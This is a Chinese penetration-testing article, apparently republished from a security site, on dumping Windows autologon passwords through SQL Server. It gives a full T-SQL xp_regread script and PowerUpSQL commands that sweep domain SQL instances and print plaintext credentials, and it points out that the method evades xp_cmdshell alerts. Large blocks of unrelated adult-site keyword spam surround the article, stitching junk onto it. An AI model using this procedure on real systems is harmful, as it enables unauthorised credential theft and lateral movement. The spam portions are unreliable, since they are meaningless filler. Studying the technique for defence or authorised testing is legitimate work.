国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

通過SQL Server與PowerUpSQL獲取Windows自動登錄密碼

安全 數據安全
在本文中,我將演示如何使用PowerUpSQL通過SQL Server轉儲Windows自動登錄密碼。 我還將談一下例如xp_regread等其他方式存儲過程在滲透測試中利用方法。

[[184013]]

前言

在本文中,我將演示如何使用PowerUpSQL通過SQL Server轉儲Windows自動登錄密碼。 我還將談一下例如xp_regread等其他方式存儲過程在滲透測試中利用方法。

xp_regread的簡短歷史

自SQL Server 2000以來,xp_regread擴展存儲過程一直存在。自從SQL Server 2000允許Public角色的成員訪問SQL Server服務帳戶中任何有權限的東西。 當時,它有一個非常大的影響,因為常見的SQL Server作為LocalSystem運行。

自從SQL Server 2000 SP4發(fā)布以來,xp_regread的影響已經相當小,由于添加了一些訪問控制,防止低特權登錄的用戶去訪問注冊表敏感的位置。 現(xiàn)在,無權限用戶只可訪問與SQL Server相關的注冊表位置。 有關這些的列表,請訪問https://support.microsoft.com/en-us/kb/887165

以下是一些更有趣的訪問路徑:

  1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Microsoft SQL Server \  
  2. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ MSSQLServer  
  3. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Search  
  4. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ SQLServer  
  5. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows消息子系統(tǒng)  
  6. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ EventLog \ Application \ SQLServer  
  7. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SNMP \ Parameters \ ExtensionAgents  
  8. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SQLServer  
  9. HKEY_CURRENT_USER \ Software \ Microsoft \ Mail HKEY_CURRENT_USER \ Control Panel \ International 

具有 Public權限的xp_regread的實際用途

xp_regread可以用來獲取很多有用的信息。 事實上,當作為最低權限登錄時,我們可以使用它來獲取無法在通過其他方式而獲得的服務器信息。 例如,PowerUpSQL中的Get-SQLServerInfo函數可以得到一些信息。

  1. PS C:\> Get-SQLServerInfo 
  2. ComputerName           : SQLServer1 
  3. Instance               : SQLServer1 
  4. DomainName             : demo.local 
  5. ServiceName            : MSSQLSERVER 
  6. ServiceAccount         : NT Service\MSSQLSERVER 
  7. AuthenticationMode     : Windows and SQL Server Authentication 
  8. Clustered              : No 
  9. SQLServerVersionNumber : 12.0.4213.0 
  10. SQLServerMajorVersion  : 2014 
  11. SQLServerEdition       : Developer Edition (64-bit) 
  12. SQLServerServicePack   : SP1 
  13. OSArchitecture         : X64 
  14. OsMachineType          : WinNT 
  15. OSVersionName          : Windows 8.1 Pro 
  16. OsVersionNumber        : 6.3 
  17. Currentlogin           : demo\user 
  18. IsSysadmin             : Yes 
  19. ActiveSessions         : 3 

在SQL Server SP4中實現(xiàn)的訪問控制限制不適用于sysadmins。 因此,SQL Server服務帳戶可以在注冊表中訪問的任何內容,sysadmin可以通過xp_regread訪問。

乍一看,這可能不是一個大問題,但它確實允許我們從注冊表中提取敏感數據,而無需啟用xp_cmdshell,當xp_cmdshell啟用和使用時可能會觸發(fā)大量警報。

使用xp_regread恢復Windows自動登錄憑據

可以將Windows配置為在計算機啟動時自動登錄。 雖然這不是企業(yè)環(huán)境中的常見配置,但這是我們在其他環(huán)境中經常看到的。 特別是那些支持傳統(tǒng)POS終端和Kiosk與本地運行SQL Server的。 在大多數情況下,當Windows配置為自動登錄時,未加密的憑據存儲在注冊表項中:

  1. HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 

利用該信息,我們可以編寫一個基本的TSQL腳本,該腳本使用xp_regread將自動登錄憑據從我們的注冊表中提取出來,而無需啟用xp_cmdshell。 下面是一個TSQL腳本示例,但由于注冊表路徑不在允許的列表中,我們必須將查詢作為sysadmin運行:

  1. ------------------------------------------------------------------------- 
  2. -- Get Windows Auto Login Credentials from the Registry 
  3. ------------------------------------------------------------------------- 
  4. -- Get AutoLogin Default Domain 
  5. DECLARE @AutoLoginDomain  SYSNAME 
  6. EXECUTE master.dbo.xp_regread 
  7. @rootkey        = N'HKEY_LOCAL_MACHINE'
  8. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  9. @value_name     = N'DefaultDomainName'
  10. @value          = @AutoLoginDomain output 
  11. -- Get AutoLogin DefaultUsername 
  12. DECLARE @AutoLoginUser  SYSNAME 
  13. EXECUTE master.dbo.xp_regread 
  14. @rootkey        = N'HKEY_LOCAL_MACHINE'
  15. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  16. @value_name     = N'DefaultUserName'
  17. @value          = @AutoLoginUser output 
  18. -- Get AutoLogin DefaultUsername 
  19. DECLARE @AutoLoginPassword  SYSNAME 
  20. EXECUTE master.dbo.xp_regread 
  21. @rootkey        = N'HKEY_LOCAL_MACHINE'
  22. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  23. @value_name     = N'DefaultPassword'
  24. @value          = @AutoLoginPassword output  
  25. -- Display Results 
  26. SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword 

我還創(chuàng)建了一個名為“Get-SQLRecoverPwAutoLogon”的PowerUpSQL函數,所以你可以直接運行它。 它將獲取到默認Windows自動登錄信息和備用Windows自動登錄信息(如果已設置)。 然后它返回相關的域名,用戶名和密碼。

下面是命令示例。

  1. PS C:\> $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”} 
  2. PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose 
  3. VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success. 
  4. VERBOSE: SQLServer2.demo.local\Application : Connection Success. 
  5. VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done. 
  6. VERBOSE: SQLServer3.demo.local\2014 : Connection Success. 
  7. VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done. 
  8. ComputerName : SQLServer1 
  9. Instance     : SQLServer1\Instance1 
  10. Domain       : demo.local 
  11. UserName     : KioskAdmin 
  12. Password     : test 
  13. ComputerName : SQLServer1 
  14. Instance     : SQLServer1\Instance1 
  15. Domain       : demo.local 
  16. UserName     : kioskuser 
  17. Password     : KioskUserPassword! 

結尾

即使xp_regread擴展存儲過程已被部分關閉,不過仍然有很多方法,可以證明在滲透測試期間十分有用。 希望你會與“Get-SQLServerInfo”,“Get-SQLRecoverPwAutoLogon”函數有更多樂趣。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2016-10-09 20:08:58

2010-07-01 11:29:57

SQL Server實

2011-04-06 14:16:49

SQL Server自動備份

2010-07-02 14:52:21

SQL Server元

2016-06-27 09:37:35

2009-08-13 16:28:07

windows2008密碼驗證

2021-07-29 23:21:01

Windows 8Windows微軟

2011-04-22 15:00:22

SQLwin7登錄

2010-11-08 14:32:00

SQL Server登

2010-12-16 11:01:55

Windows Ser

2010-07-19 14:24:15

SQL Server盤

2016-12-22 09:11:24

Windows 10Windows 8Windows 7

2016-10-14 08:45:19

Windows 10隱藏密碼

2009-05-14 13:18:50

SQL Server代理任務微軟

2009-08-25 16:16:27

C#調用Windows

2010-04-27 09:48:09

2010-07-13 09:20:38

SQL Server

2010-06-23 09:23:56

SQL Server

2010-07-07 13:58:25

SQL Server死

2010-07-22 16:02:29

點贊
收藏

51CTO技術棧公眾號

亚洲综合电影| 国产成人av一区二区三区| 91欧美视频在线| 日日骚欧美日韩| 欧美成人免费播放| 超碰中文在线| 欧美在线观看视频一区二区| 国产福利在线播放| 97成人超碰视| 国产精品免费看久久久无码| 国产精品久久777777毛茸茸| 国产精品一二三视频| a看欧美黄色女同性恋| 色婷婷久久av| 欧美成人福利| 色先锋资源久久综合5566| 蜜臀av在线| 欧美一区二区三区小说| 在线观看免费黄色| 91成人在线观看喷潮| 污污网站在线| 精品女厕一区二区三区| 国产精品精华液网站| 亚洲综合偷拍欧美一区色| 一级在线免费视频| 久久久久国产成人精品亚洲午夜| 免费日韩视频在线观看| 国产精品无人区| 快播av资源| 欧美性xxxx极品hd满灌| 1769在线观看| 欧美精品一区二区三| 美女搞黄视频在线观看| 亚洲天堂一区二区三区| 国产资源一区| 91爱爱小视频k| 手机亚洲手机国产手机日韩| 国产精品91一区| 希岛爱理av一区二区三区| 97在线电影| 99人久久精品视频最新地址| 国内精品二区| 激情国产一区二区| 亚洲免费av一区二区三区| 一区二区三区色| 你懂的在线播放| 91精品在线麻豆| 日本在线啊啊| 高清欧美电影在线| 亚洲澳门在线| 亚洲综合网中心| 国产亚洲综合在线| 日本一二区视频| 欧美日韩国产综合视频在线观看| av成人 com a| 久久久久在线观看| 午夜精品一区二区三区国产 | 天天操夜夜干| 亚洲va欧美va人人爽午夜| 欧美尤物美女在线| 国产一区二区三区在线观看视频| 午夜精品在线| 国产精品二区在线| 成人毛片老司机大片| av三级在线播放| 日韩一卡二卡三卡国产欧美| 一区二区免费| 久久精精品视频| 2021国产精品久久精品| 久热av在线| 久久精品成人欧美大片古装| 精品美女在线视频| 欧美日韩在线观看一区| 久久婷婷色综合| 国产精品久久久久一区二区国产| 国产午夜精品免费一区二区三区| 麻豆国产欧美一区二区三区r| 国内精品一区二区| 国产日韩精品一区二区三区| www.欧美日本韩国| 91av视频在线观看| 麻豆91在线观看| 色影视在线视频资源站| 亚洲精选在线观看| 色综合咪咪久久网| 国产在线视频综合| 欧美视频免费在线| 成人午夜在线| 麻豆亚洲一区| 一区二区三区四区视频精品免费| 成年美女黄网站色大片不卡| 亚洲aa在线观看| 久久精品亚洲精品国产欧美 | 亚洲欧美视频一区| 中文字幕在线视频久| 国产一区二区香蕉| 99久久精品费精品国产一区二区| av在线中文| 欧美有码在线视频| 国产99精品国产| 动漫一区在线| 亚洲在线观看视频网站| 国产精品乱人伦| 欧美少妇激情| 日本精品免费视频| 欧美一卡2卡3卡4卡| 欧美xxxxx视频| 国产精品人人妻人人爽人人牛| 精品三级在线看| 国产一区亚洲| 调教视频在线观看| 欧美国产日韩视频| 国产成a人无v码亚洲福利| 成人免费高清| 国产一区免费| 色国产综合视频| 精品国产午夜| 亚洲一级免费观看| 最好看的2019年中文视频| 麻豆免费精品视频| 色在线视频网| 久久国产精品免费一区| 欧美小视频在线| 日韩在线视频精品| 国产wwww| 欧美亚洲国产视频小说| av中文字幕亚洲| 久久天堂av| 国产aaa免费视频| 亚洲精品中文字| 麻豆精品一区二区综合av| 黄色免费网站在线| 久久riav二区三区| 在线综合+亚洲+欧美中文字幕| 亚洲精品日韩久久| 日本在线观看网站| 鲁丝一区二区三区免费| 欧美剧在线免费观看网站| 亚洲最黄网站| 调教一区二区| 一区二区三区四区| 亚洲欧美国产一区二区三区| 国产精品一区免费在线观看| 神马久久资源| 激情五月宗合网| 久久久久久久久久久成人| 国产精品久久久久毛片软件| 久久不见久久见国语| 午夜亚洲成人| 国产另类自拍| 欧美电影免费提供在线观看| 国产乱淫av一区二区三区 | 久久99久久人婷婷精品综合| 动漫成人在线| 国产精品视频入口| 精品日韩欧美一区二区| 国产酒店精品激情| av成人资源| 四虎影院在线播放| 欧美日韩高清免费| 国产亚洲欧美一区| 欧美激情中文字幕一区二区| 国产精品美女久久久久久不卡 | 高清不卡日本v二区在线| 91精品黄色片免费大全| 国产精品系列在线观看| 福利一区三区| 又黄又爽在线免费观看| 久久综合中文色婷婷| 亚洲日韩中文字幕| 欧美国产综合色视频| 欧美搞黄网站| 亚洲人免费短视频| 男人天堂v视频| 日本欧美色综合网站免费| 在线看日韩欧美| 亚洲黄色在线视频| 老色鬼久久亚洲一区二区| 亚洲欧美在线人成swag| 中文字幕一二三区在线观看| 亚洲精品美女久久7777777| 欧美国产乱视频| 欧美日韩一区在线观看| av亚洲精华国产精华精| 国产精品精品| 免费污视频在线一区| 天堂av电影在线观看| 人妻互换免费中文字幕| 成人免费午夜电影| 亚洲精品永久免费| 亚洲一区在线观看免费| 加勒比av一区二区| 欧美综合一区| 欧美日韩精品一区二区三区视频| 黄色成人av| 欧美性视频在线播放| 国产在线久久久| 在线播放日韩专区| 欧美日韩国产综合视频在线观看| 久久精品一二三|